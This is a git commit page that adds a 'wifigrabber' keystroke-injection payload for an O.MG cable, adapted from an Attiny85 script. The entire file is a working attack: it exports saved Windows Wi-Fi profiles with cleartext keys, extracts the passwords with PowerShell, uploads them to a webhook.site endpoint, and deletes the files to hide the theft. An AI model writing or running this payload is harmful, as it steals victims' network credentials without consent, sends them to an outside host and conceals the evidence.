wifigrabber

pull/2/head
Dante Sparda 2021-10-12 13:03:09 -04:00 committed by GitHub
parent b8278f2c87
commit b89c452d57
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 27 additions and 0 deletions

View File

@ -0,0 +1,27 @@
REM I took my own code and found the other version already made. I combined them to make it better
REN this is a modified version of https://github.com/MTK911/Attiny85/blob/master/payloads/Wi-Fi%20password%20stealer/Wifikey-Grab.ino
REM this is designed for the omg cable instead of the tiny.
Delay 3000
STRING GUI r
Delay 100
String cmd /k mode con: cols=15 lines=1
Enter
Delay 500
String cd %temp%
Enter
Delay 500
String netsh wlan export profile key=clear
Enter
Delay 1000
String powershell Select-String -Path Wi*.xml -Pattern 'keyMaterial' > Wi-Fi-PASS
Enter
Delay 3000
String powershell Invoke-WebRequest -Uri https://webhook.site/<ADD-WEBHOOK-ADDRESS-HERE> -Method POST -InFile Wi-Fi-PASS
Enter
Delay 3000
String del Wi* /s /f /q
Enter
Delay 1000
Exit